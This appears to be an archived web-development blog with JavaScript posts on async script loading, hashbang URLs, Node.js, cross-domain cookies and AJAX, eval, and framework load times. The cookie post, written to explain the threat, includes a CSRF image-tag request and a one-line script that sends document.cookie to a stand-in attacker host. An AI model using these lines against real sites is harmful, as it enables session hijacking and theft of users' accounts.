Showing posts with label java script. Show all posts

Wednesday, November 7, 2012

Asynchronous JS loading without blocking onload

Asynchronous loading is the best way to include a JS file in your HTML page, but it still blocks the window.onload event (except in IE before version 10).

Check out here how onload is blocked even when we use async JS loading techniques:

http://www.stevesouders.com/blog/2012/01/13/javascript-performance/

http://calendar.perfplanet.com/2010/the-truth-about-non-blocking-javascript/

So here is another solution for the same problem :-)
  1. Create an iframe without setting src to a new URL. This fires the iframe's onload immediately and the whole thing is completely out of the way.
  2. Style the iframe to make it invisible.
  3. Get the last script tag so far, which is the snippet itself. This is in order to glue the iframe to the snippet that includes it.
  4. Insert the iframe into the page.
  5. Get a handle to the document object of the iframe.
  6. Write some HTML into that iframe document.
  7. This HTML includes the desired script.
Code:

(function (url) {
    var iframe = document.createElement('iframe');
    (iframe.frameElement || iframe).style.cssText = "width: 0; height: 0; border: 0";
    var where = document.getElementsByTagName('script');
    where = where[where.length - 1];
    where.parentNode.insertBefore(iframe, where);
    var doc = iframe.contentWindow.document;
    doc.open().write('<body onload="' +
        'var js = document.createElement(\'script\');' +
        'js.src = \'' + url + '\';' +
        'document.body.appendChild(js);">');
    doc.close();
})('http://www.jspatterns.com/files/meebo/asyncjs1.php');

Issues:

1. Avoid SSL warnings: iframe.src defaults to “about:blank” in IE6, which it then treats as insecure content on HTTPS pages. We found that initializing iframe.src to “javascript:false” avoids this.

2. Avoid crossdomain exceptions: anonymous iframe access will throw exceptions if the host page changed the document.domain value in IE. The original Meebo code falls back to a “javascript:” URL when this happens.


3. The script (asyncjs1.php) runs in an iframe, so all document and window references point to the iframe, not the host page. There's an easy solution for that without changing the whole script: just wrap it in an immediate function and pass in the document object the script expects:

(function(document){
document.getElementById('r')... // all fine
})(parent.document);

4. The script works fine in Opera, but blocks onload. Opera is weird here: even regular async scripts block DOMContentLoaded, which is a shame.

The code below seems to solve our problem. Try it and let me know the results:

https://github.com/pablomoretti/jcors-loader

Sunday, June 24, 2012

shebang/hashbang and Single Page Interface Good or Bad

We have all noticed long URLs including # or #! on Twitter and Facebook. The hash mark # introduces the fragment identifier, the optional last part of a URL for a document, typically used to identify a portion of that document.
The behavior of # depends on the document MIME type; in PDF, for example, it acts in a different manner.

The reason that Facebook and other JavaScript-driven applications use this is that they want to make pages indexable and bookmarkable and to support the back button without reloading the entire page from the server. This technique is called Single Page Interface and is based on JavaScript routing.
When we use #!, the URL is considered "AJAX crawlable." So if the URL is /ajax.html#!key=value, it temporarily becomes /ajax.html?_escaped_fragment_=key=value. This happens because
hash fragments are never (by specification) sent to the server as part of an HTTP request, so the crawler needs some way to let your server know that it wants the content for the URL with #.
The server, on the other hand, needs to know that it has to return an HTML snapshot, rather than the normal page sent to the browser. Here the snapshot is all the content that appears on the page after the JavaScript has been executed.
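The crawler-side rewrite described above can be sketched as a small function (a simplified illustration of the scheme, not Google's actual implementation; the real scheme also percent-escapes some special characters in the fragment):

```javascript
// Rewrite a hashbang URL into the form a crawler sends to the server.
function toCrawlerUrl(url) {
  var i = url.indexOf('#!');
  if (i === -1) return url; // no hashbang: nothing to rewrite
  var base = url.slice(0, i);
  var fragment = url.slice(i + 2);
  // The fragment is never sent to the server, so the crawler moves it
  // into a query parameter the server can actually see.
  var sep = base.indexOf('?') === -1 ? '?' : '&';
  return base + sep + '_escaped_fragment_=' + fragment;
}
```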

Other Uses except AJAX
We can also use #! in pagination. URLs like blog/topic/page/1 and blog/topic/page/2 can appear as duplicate content, which Google doesn't like, so in this case hashbangs may be better, or just a robots noindex on any page that is a pagination of another page.

Another benefit of this technique is that loading page content through AJAX and then injecting it into the current DOM can be much faster than loading a new page. In addition to the speed increase, further tricks like loading certain portions in the background can be performed under the programmer's control.

Issues

With hashbang URLs, the browser needs to download an HTML page, download and execute some JavaScript, recognize the hashbang path (which is only visible to the browser), then fetch and render the content for that URL. So by removing it, we can reduce the page load time.


Spiders and search indexers can and do sometimes implement JavaScript runtimes. However, even in this case there’s no well recognised way to say ‘this is a redirect’ or ‘this content is not found’ in a way that non-humans will understand.

Also, the code will not be maintainable unless we use some kind of modular code on the front-end side (JavaScript); otherwise it will be very hard to adopt further enhancements and support the existing code.

Solution

location.hash was a way for AJAX applications to get back-button and bookmarking support.

HTML5 now introduces pushState, which provides a way to change the URL displayed in the browser through JavaScript without reloading the page.

window.history.pushState(data, "Title", "/new-url");

In order to support the back and forward buttons we must be notified when they are clicked. We can do that using the window.onpopstate event. This event gives access to the state data that was passed to pushState earlier. Of course, we can still manually go back and forward with the standard history functions.
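A minimal sketch of the routing side of this (the routes table and page names are made up for illustration; in a browser, render would be called from link-click handlers after pushState and from window.onpopstate):

```javascript
// A tiny client-side routing table: path -> handler.
var routes = {
  '/': function () { return 'home page'; },
  '/new-url': function () { return 'new page'; }
};

// Resolve a path to its rendered content.
function render(path) {
  var handler = routes[path];
  return handler ? handler() : 'not found';
}

// Browser wiring would look roughly like:
//   window.history.pushState(data, "Title", "/new-url"); render("/new-url");
//   window.onpopstate = function () { render(location.pathname); };
```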

Currently, pushState has support from the latest versions of Safari and Chrome, and Firefox 4 will be supporting it as well. It is worth noting that Flickr is already using the API in their new layout.
Libraries like jQuery BBQ start to support this feature with fallback to the old hash trick.

The hard part is that support for history.pushState in Internet Explorer does not appear to be forthcoming. That makes the argument that browsers are quickly adopting the feature pretty dubious, since IE accounts for a good 30-40% of traffic.

I found a very nice case study on this, where you can understand how hashbangs impact page routing and what the basic pitfalls are.

Wednesday, September 21, 2011

web based business development and node js

I was really shocked when I installed Node.js and ran a few test scripts. It's tremendously powerful and gives you wings to do anything. We can build a chat server in a few minutes, as well as web servers, TCP/IP services, message queues, DB connections, etc.


Main advantages are:



  1. Web development in a dynamic language (JavaScript) on a VM that is incredibly fast (V8). It is much faster than Ruby, Python, PHP or Perl.
  2. Ability to handle thousands of concurrent connections with minimal overhead on a single process.
  3. JavaScript is perfect for event loops with first class function objects and closures. People already know how to use it this way having used it in the browser to respond to user initiated events.
  4. A lot of people already know JavaScript, even people who do not claim to be programmers. It is arguably the most popular programming language.
  5. Using JavaScript on a web server as well as the browser reduces the impedance mismatch between the two programming environments which can communicate data structures via JSON that work the same on both sides of the equation. Duplicate form validation code can be shared between server and client, etc.
While I elaborate on things, I will share a few more details with screenshots, which might be interesting to you to understand the magic of Node.js.

Monday, September 12, 2011

cross domain cookies, third party cookies and cross site ajax: facts and myths

There are a few questions in my mind which need appropriate and correct answers:
  1. Is it possible to set a cookie for another domain with JavaScript?
  2. Are cross-domain AJAX calls, or cross-sub-domain AJAX (XHR) requests, possible?
  3. How does OpenSocial work?
Below I discuss each one by one, but please feel free to post your comments if you see any needed correction here or have some queries or comments.


We know the basics of cookies (http://ravirajsblog.blogspot.com/2010/11/abc-of-http-cookie-detailed-look.html) and a typical PHP session issue (http://ravirajsblog.blogspot.com/2010/06/php-session-issue.html).


Actually there are some security concerns in cross-domain communication; even server-side languages need some settings when communicating across servers
(http://php.net/manual/en/filesystem.configuration.php).
The main concerns are cookie stealing, XSS (http://ha.ckers.org/xss.html) and Cross-Site Request Forgery (CSRF). CSRF is now generally avoided by filtering user input; otherwise things like the following occur:


<img src="http://bank.example/withdraw?account=raviraj&amount=1000000000&for=bob"> 


Anyway, coming back to cookie stealing.
Cookies are sent in plain text over the Internet, making them vulnerable to packet sniffing whereby someone intercepts traffic between a computer and the Internet. Once the value of a user’s login cookie is taken, it can be used to simulate the same session elsewhere by manually setting the cookie. The server can’t tell the difference between the original cookie that was set and the duplicated one that was stolen through packet sniffing, so it acts as if the user had logged in. This type of attack is called session hijacking.


A script loaded from another domain will get that page’s cookies by reading document.cookie.


As an example of how dangerous this is, suppose I load a script from evil-domain.com that contains some actually useful code. However, the folks at evil-domain.com then switch that code to the following:


(new Image()).src = "http://www.evil-domain.com/cookiestealer.php?cookie=" + encodeURIComponent(document.cookie);


Now this code is loaded on my page and silently sends my cookies back to evil-domain.com. This happens to everyone who visits my site. Once they have my cookies, it’s much easier to perpetrate other attacks including session hijacking.


There are a few ways to prevent session hijacking using cookies.


The first, and most common technique among the security-conscious, is to only send cookies over SSL. Since SSL encrypts the request on the browser before transmitting across the Internet, packet sniffing alone can’t be used to identify the cookie value. Banks and stores use this technique frequently since user sessions are typically short in duration.


Another technique is to generate a session key in some random fashion and/or a way that is based on information about the user (username, IP address, time of login, etc.). This makes it more difficult to reuse a session key, though doesn’t make it impossible.


Yet another technique is to re-validate the user before performing an activity deemed to be of a higher security level, such as transferring money or completing a purchase. For example, many sites require you to log in a second time before changing a password etc.


So finally all browsers decided to follow the "same origin policy" concept.


Same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites. This mechanism bears a particular significance for modern web applications that extensively depend on HTTP cookies to maintain authenticated user sessions, as servers act based on the HTTP cookie information to reveal sensitive information or take state-changing actions. A strict separation between content provided by unrelated sites must be maintained on the client side to prevent the loss of data confidentiality or integrity.
But the behavior of same-origin checks and related mechanisms is not well-defined in a number of corner cases, such as for protocols that do not have a clearly defined host name or port associated with their URLs.


Well, the confusion comes when you start talking about first party and third party cookies and how they are treated differently by web browsers.


A first party cookie is a cookie that is given to the website visitor by the same domain (www.domain.com) that the web page resides on. Whereas, a third party cookie is one that is issued to the website visitor by a web server that is not on the same domain as the website.


Web pages allow inclusion of resources from anyplace on the web. For example, many sites use the YUI CSS foundation for layout and therefore include these files from the Yahoo! CDN at yui.yahooapis.com via a <link> tag. Due to cookie restrictions, the request to retrieve this CSS resource will not include the cookies for ravirajsblog.blogspot.com. However, yui.yahooapis.com could potentially return its own cookies with the response (it doesn’t; it’s a cookie-less server). The page at ravirajsblog.blogspot.com cannot access cookies that were sent by yui.yahooapis.com because the domain is different, and vice versa, but all the cookies still exist. In this case, yui.yahooapis.com would be setting a third-party cookie, which is a cookie tied to a domain separate from the containing page.


There are several ways to include resources from other domains in HTML:

  1. Using a <link> tag to include a style sheet.
  2. Using a <script> tag to include a JavaScript file.
  3. Using an <object> or <embed> tag to include media files.
  4. Using an <iframe> tag to include another HTML file.

In each case, an external file is referenced and can therefore return its own cookies. The interesting part is that with the request, these third-party servers receive an HTTP Referer header (the spelling is incorrect in the spec) indicating the page that is requesting the resource. The server could potentially use that information to issue a specific cookie identifying the referring page. If that same resource is then loaded from another page, the cookie would then be sent along with the request and the server can determine that someone who visited Site A also visited Site B. This is a common practice in online advertising. Such cookies are often called tracking cookies since their job is to track user movement from site to site. This isn’t actually a security threat but is an important concept to understand in the larger security discussion.
Generally third party cookies are issued for banner advertiser who places a number of banners on your site and wants to know how many times it has been requested, or it could be a third party hosted analytics vendor that issues a page tag for each of your pages that forces a cookie on your site.
In the last situation, where an analytics vendor issues a cookie through a page tag, the cookie is seen as a third-party cookie because it is generated by the analytics server, which serves the invisible 1×1 tracking GIF requested by the page tag. It is however possible to have an analytics cookie issued by the third-party vendor but still look like a first-party cookie.
There are two ways of achieving this:
  1. Create a DNS alias for the third-party analytics server so that it looks like part of your domain; anything issued by this server (including cookies) then becomes first party.
  2. Have the JavaScript page tag create a cookie at run-time and then pass the cookie value back to the analytics server, so the cookie is created within the page and thus becomes a first-party cookie.
The obvious advantage of the DNS alias option is that you can have a smaller page tag which is quicker to load. However, the cookie-making page tag has an advantage over the DNS alias because no structural changes need to be made to the site’s infrastructure, and the implementation of the tag is more straightforward. Check out how GA handles cross-domain tracking, especially for e-commerce:
http://cutroni.com/blog/2006/06/25/how-google-analytics-tracks-third-party-domains/


Back to our questions. The answer to the first one is:
No, that will not work, for security reasons. You cannot do it with cookies alone. They are set explicitly per-domain, and there isn't a legitimate (read: "non-exploit") way to set them for another domain. However, if you control both servers, it may be possible to use some workarounds/hacks to achieve this, but it isn't pretty, and it may break unexpectedly.


Let's see how OAuth works; using the same technique we can achieve our goal. [See the anonymous commenter's posts, which describe the flow nicely.]


Approach designates one domain as the 'central' domain and any others as 'satellite' domains.
When someone clicks a 'sign in' link (or presents a persistent login cookie), the sign in form ultimately sends its data to a URL that is on the central domain, along with a hidden form element saying which domain it came from (just for convenience, so the user is redirected back afterwards).
This page at the central domain then proceeds to set a session cookie (if the login went well) and redirect back to whatever domain the user logged in from, with a specially generated token in the URL which is unique for that session.
The page at the satellite URL then checks that token to see if it does correspond to a token that was generated for a session, and if so, it redirects to itself without the token, and sets a local cookie. Now that satellite domain has a session cookie as well. This redirect clears the token from the URL, so that it is unlikely that the user or any crawler will record the URL containing that token (although if they did, it shouldn't matter, the token can be a single-use token).
Now, the user has a session cookie at both the central domain and the satellite domain. But what if they visit another satellite? Well, normally, they would appear to the satellite as unauthenticated.
However, throughout the application, whenever a user is in a valid session, all links to pages on the other satellite domains have a ?s or &s appended to them. I reserve this 's' query string to mean "check with the central server because we reckon this user has a session". That is, no token or session id is shown on any HTML page, only the letter 's', which cannot identify someone.
A URL receiving such an 's' query tag will, if there is no valid session yet, do a redirect to the central domain saying "can you tell me who this is?" by putting something in the query string.
When the user arrives at the central server, if they are authenticated there the central server will simply receive their session cookie. It will then send the user back to the satellite with another single use token, which the satellite will treat just as a satellite would after logging in (see above). Ie, the satellite will now set up a session cookie on that domain, and redirect to itself to remove the token from the query string.
This solution works without script or iframe support. It does require '?s' to be added to any cross-domain URLs where the user may not yet have a cookie. I think this is possibly one approach to how we end up logged in to Gmail when we are already browsing Orkut as a registered user.


So we are disappointed by the first answer!! Don't worry, let's look at the second one; I am trying my best to say yes, however ;-)


The answer to the second one is NO... This restriction comes from the same origin policy; even sub-domain AJAX calls are not allowed. There are, however, workarounds.


By enabling the mod_proxy module of apache2, we can configure Apache in reverse proxy mode. In reverse proxy mode, apache2 appears to the browser like an ordinary web server. However, depending upon the proxy rules defined, apache2 can make cross-domain requests and serve the data back to the browser.


Another method of achieving sub-domain ajax requests is by using iframes. However, javascript does not allow communication between two frames if they don’t have same document.domain. The simplest of the hacks to make this communication possible is to set document.domain of the iframe same as that of the parent frame.


The second method deals with cases when you want to fetch data from a sub-domain. You can’t make an AJAX call directly from the parent page, hence you do it through iframes. Consider the case of Facebook chat: if you look in Firebug, all chat-related AJAX is sent to channel.facebook.com, which is achieved via the iframe approach.


A few hacky open-source options are also available, like JSONP: http://remysharp.com/2007/10/08/what-is-jsonp/
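The core JSONP trick is to register a global callback and load a script whose URL names that callback; here is a sketch of the client side (the global object is passed in explicitly so the idea can be shown outside a browser, and the URL is illustrative):

```javascript
var jsonpCounter = 0;

function jsonp(global, url, onData) {
  // Register a one-shot global callback that the server's response invokes.
  var cbName = '__jsonp' + (jsonpCounter++);
  global[cbName] = function (data) {
    delete global[cbName]; // clean up after the single response
    onData(data);
  };
  var sep = url.indexOf('?') === -1 ? '?' : '&';
  var src = url + sep + 'callback=' + cbName;
  // In a browser you would now create a <script> tag with this src and
  // append it to <head>; the server replies with: __jsonp0({...});
  return src; // returned so the sketch can be exercised without a DOM
}
```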


Now come to the last question: how does OpenSocial work?
This is a big topic which needs detailed treatment. There are many components we need to understand before looking at OpenSocial, like Shindig, the Gadget Server, RPC, REST, the container server, container applications, etc.
Here is a good link to know more about OpenSocial.
That's it for now. Cheers!!!

Thursday, December 23, 2010

Few more thoughts on script loaders in websites

Last week JS guru Steve Souders (Google) released his ControlJS project. The goal of the project is to give developers the freedom to load JS files and execute them later on a page, as per user action.
On our site shiksha.com, we already apply the same technique: we load heavy dynamic pages in an overlay (modal box) through AJAX. But initially we ran into one problem: if we load a page with AJAX, and that page contains inline JS code, then that JS code will not be executed. So we used a technique/hack and solved the issue.

Actually, we parse all the inline JS and CSS that comes in script and style HTML tags and eval it later, once we get the AJAX success callback. Here is the code for that.

function ajax_parseJs(obj)
{
    var scriptTags = obj.getElementsByTagName('SCRIPT');
    var jsCode = '';
    for (var no = 0; no < scriptTags.length; no++) {
        if (scriptTags[no].src) {
            // external script: re-create the tag so the browser fetches it
            var head = document.getElementsByTagName("head")[0];
            var scriptObj = document.createElement("script");
            scriptObj.setAttribute("type", "text/javascript");
            scriptObj.setAttribute("src", scriptTags[no].src);
            head.appendChild(scriptObj); // actually insert the tag so the script loads
        } else {
            // inline script: collect the code to eval later
            if (navigator.userAgent.indexOf('Opera') >= 0) {
                jsCode = jsCode + scriptTags[no].text + '\n';
            } else {
                jsCode = jsCode + scriptTags[no].innerHTML;
            }
        }
    }

    if (jsCode) ajax_installScript(jsCode);
}
function evaluateCss(obj)
{
    var cssTags = obj.getElementsByTagName('STYLE');
    var head = document.getElementsByTagName('HEAD')[0];
    for (var no = 0; no < cssTags.length; no++) {
        head.appendChild(cssTags[no]);
    }
}
function ajax_installScript(script)
{
    if (!script)
        return;
    if (window.execScript) { // IE
        window.execScript(script);
    } else { // all other browsers, including Safari: defer evaluation
        window.setTimeout(script, 0);
    }
}

So I thought: can we do the same for script loading? I think it's not a big deal to load a script and execute it
when the developer wants. Here is code for that.


function loadScript(url, callback){
    var script = document.createElement("script")
    script.type = "text/javascript";
    if (script.readyState){  //IE
        script.onreadystatechange = function(){
            if (script.readyState == "loaded" ||
                    script.readyState == "complete"){
                script.onreadystatechange = null;
                callback();
            }
        };
    } else {  //Others
        script.onload = function(){
            callback();
        };
    }
    script.src = url;
    document.getElementsByTagName("head")[0].appendChild(script);
}


var script = document.createElement("script");
script.type = "text/cache"; // non-executable type: the browser downloads the file but doesn't run it
script.src = "foo.js";
script.onload = function(){
    //script has been loaded but not executed
};
document.body.insertBefore(script, document.body.firstChild);

//at some point later
//(note: execute() is a proposed API, not something browsers implement;
//ControlJS emulates this download-now/execute-later behavior)
script.execute();

Hope the above techniques are clear and you don't have any doubts. If you still have any query, then write to me by mail at tussion @ ymail dot com.

Happy coding ... Enjoy XMAS holidays ...

Thursday, March 19, 2009

Eval is Evil ...

The eval method in JS takes a string containing JavaScript code, compiles it and runs it. It is probably the most powerful and most misused method in JavaScript.
In the majority of cases, eval is used like a sledgehammer swatting a fly -- it gets the job done, but with too much power. It's slow, it's unwieldy, and tends to magnify the damage when you make a mistake. Please spread the word far and wide: if you are considering using eval then there is probably a better way. Think hard before you use eval. eval starts a compiler. Before you use it, ask yourself whether there is a better way to solve this problem than starting up a compiler!

Here are a few points that argue against using eval.

Debugability: what is easier to debug, a program that dynamically generates new code at runtime, or a program with a static body of code?

Maintainability: what's easier to maintain, a table, or a program that dynamically spits out new code?

Speed: which do you think is faster, a program that dereferences an array, or a program that starts a compiler?

Think about a string containing more than 10,000 people's names that we want to eval. JavaScript runs into problems manipulating and eval()ing very large strings.


Memory: which uses more memory, a program that dereferences an array, or a program that starts a compiler and compiles a new chunk of code every time you need to access an array?
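In almost every case there is a direct, faster replacement for eval; here are two common ones as a sketch (the data is made up for illustration):

```javascript
// 1. Parsing JSON: use JSON.parse instead of eval'ing the string.
//    (In older browsers, Crockford's json2.js provides the same API.)
var user = JSON.parse('{"name": "raviraj", "id": 42}');

// 2. Dynamic property access: use bracket notation instead of
//    eval('obj.' + key), which would start the compiler just to
//    dereference a property.
var config = { host: 'localhost', port: 8080 };
function lookup(obj, key) {
  return obj[key];
}
```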


Learn More ....

http://blogs.msdn.com/ericlippert/archive/2003/11/04/53335.aspx

http://blogs.msdn.com/ericlippert/archive/2003/11/01/53329.aspx


Saturday, December 20, 2008

Which Javascript frameworks are the most common and why ?

The frameworks I looked at for this article were Prototype, jQuery, MooTools, Yahoo! UI Library, Dojo, ExtJS and MochiKit.

Prototype

Prototype is one of the earlier JavaScript frameworks. Of the websites in this test, a total of 13 used the Prototype framework.

JQuery

JQuery is a framework that has received a lot of attention due to its speed, size and smart modular approach which has led to a big library of plugins. Of the websites in this test, 11 used the JQuery framework.

MooTools

Just like other Javascript frameworks, MooTools contains several functions to help development. One of the more known ones is its advanced effects component. Of the websites in this test, four used the MooTools frameworks.

Yahoo! UI Library (YUI)

Yahoo has developed its own Javascript framework. They use it for their own websites, but have also made it freely available to others. Of the websites in this test, seven used the Yahoo! UI Library.

The ones using more than one framework were Digg (Prototype and JQuery), Bebo (MooTools and YUI) and YouSendIt (Prototype and YUI).

Prototype turned out to be the most-used framework in this survey, and it takes the cake, but jQuery is not far behind. Please see the following links regarding which is best.

http://blog.solnic.eu/2007/11/11/jquery-vs-prototype-part-i


http://blog.solnic.eu/2008/2/3/jquery-vs-prototype-part-ii

Finally, I must say that jQuery and Prototype are both great libraries. I think jQuery's philosophy (type less, do more; keep things intuitive and unobtrusive) will make a big difference.

Size is always a concern, but most important is speed :) and again Prototype succeeds here:
we can get it as a 14.4kb gzipped file.


http://groups.google.com/group/prototype-core/browse_thread/thread/ef05ede819727d52

http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.3/prototype.js
http://groups.google.com/group/prototype-core

But in the end we cannot close our eyes. I think jQuery is really starting to overtake Prototype, and Prototype is losing ground. No matter how great a library is, with the current strategy this fantastic lib will not survive. Prototype should have components: not a whole lot, but at least a few basic ones like jQuery's tabs, accordion, etc. I request the Prototype dev team to do something about it, because people are starting to get worried!!!

Wednesday, December 17, 2008

one more markup editor ...

SmartMarkUP is a lightweight, powerful and fancy markup editor.
HTML, CSS, XML, Wiki syntax, BBCode or any other desired markup language can be implemented and/or adjusted per our preferences and business needs.

http://www.phpcow.com/smartmarkup/

Features:-
* It is completely free and open source.
* It is a small script; the compressed version weighs only 10kb.
* It is completely skinnable, so we can fit its design to our applications easily.
* It can be used from any other script.
* It is self-contained and doesn't depend on any third-party scripts. We can use it with Prototype, jQuery, MooTools or any other JavaScript library.
* It doesn't require changing any already existing markup or code infrastructure.
* It degrades gracefully, which means our application will continue working in browsers with JavaScript disabled.

Friday, December 12, 2008

what is cross domain XMLHttpRequest (CS-XHR) ?

The W3C defines a framework that gives client-side documents greater control over who can, and cannot, request them via a browser-based request (such as an AJAX request). That W3C framework is called W3C Access Control.

Additionally, this access control scheme gives applications the ability to allow for cross-site requests.
Thus one could, theoretically, request a document from google.com, via an XMLHttpRequest in a page on yoursite.com (once the access control points were put in place). This level of control gives content creators greater amounts of flexibility when it comes to allowing their users to build mashups and applications using their information.
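On the server side, such an access-control check boils down to comparing the request's Origin header against a whitelist and, if it matches, echoing it back in the response's Access-Control-Allow-Origin header. A minimal sketch of that decision (the whitelist here is illustrative):

```javascript
// Origins permitted to make cross-site requests to this server.
// This list is a made-up example, not a recommended policy.
var allowedOrigins = ['http://yoursite.com', 'https://yoursite.com'];

// Returns the value to send in Access-Control-Allow-Origin,
// or null to send no header (denying the cross-site request).
function allowOriginHeader(requestOrigin) {
  return allowedOrigins.indexOf(requestOrigin) !== -1 ? requestOrigin : null;
}
```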

JavaScript Library Loading Speed

There was an interesting piece of JavaScript performance analysis done recently by the PBWiki team. They wanted to understand how quickly JavaScript libraries load (their loading speed obviously grossly affects the total loading speed of a page). They set up a system to gather input from random browsers, aggregating the results into a final breakdown. There's a lot that application and browser developers can learn from the results; the total information available is actually quite profound:

JavaScript Packaging Techniques

When distributing a piece of JavaScript code it's traditional to think that the smallest (byte-size) code will download and load the fastest. This is not true, and that is a fascinating result of this survey. Look at the speed of loading jQuery in three forms: normal, minified (using Yahoo Min), and packed (using Packer). By order of file size, packed is the smallest, then minified, then normal. However, the packed version has an overhead: it must be uncompressed, on the client side, using a JavaScript decompression algorithm. This unpacking has a tangible cost in load time. This means, in the end, that using a minified version of the code is much faster than the packed one, even though its file size is quite a bit larger.

Packaging Comparison (loading jquery, all variants)

Technique Time Avg (ms) Samples
minified 519.7214 12611
packed 591.6636 12606
normal 645.4818 12589

Next time you pick a compression technique, remember this formula:

Total_Speed = Time_to_Download + Time_to_Evaluate

JavaScript Library Performance

The next nugget of information that we can unearth is the total performance of JavaScript libraries when loading within a page (this includes their transfer time and their evaluation time). Thus, a library that is both smaller and simpler will load faster. Looking at the results you can see a comparatively large lead for jQuery (200-400ms, a perceptible difference in speed).

Average Time to Load Toolkit (non cached, gzipped, minified)

Toolkit Time Avg (ms) Samples
jquery-1.2.1 732.1935 3152
dojo-1.0.1 911.3255 3143
prototype-1.6.0 923.7074 3144
yahoo-utilities-2.4.0 927.4604 3141
protoculous-1.0.2 1136.5497 3136

Now, some might argue that testing the speed of un-cached pages is unfair; however, according to Yahoo's research on caching, approximately 50% of users will never have the opportunity to have the page contents cached. Thus, making sure that your page loads quickly both on initial load and on subsequent loads should be of the utmost importance.

Average Time to Load Toolkit (cached, gzipped, minified)

Toolkit Time Avg (ms) Samples
yahoo-utilities-2.4.0 122.7867 3042
jquery-1.2.1 131.1841 3161
prototype-1.6.0 142.7332 3040
dojo-1.0.1 171.2600 3161
protoculous-1.0.2 276.1929 3157

Once you examine cached speeds the difference becomes much less noticeable (10-30ms difference, with the exception of Prototype/Scriptaculous). Since these results are completely cached we can gauge, roughly, the overhead contributed by file transfer in comparison to evaluation speed.

If nothing else, I think this type of analysis warrants further examination. Using user-generated input, against live datasets, to create real-world performance metrics is quite lucrative to everyone involved - to users, framework developers, and browser vendors.

» More information on web browser performance is shown below.

Browser Time Avg (ms) Samples
Firefox 3.x 14.0000 2
Safari 19.8908 284
IE 7.x 27.4372 247
IE 6.x 41.3167 221
Firefox 2.x 111.0662 2009
Opera 5.x 925.3057 157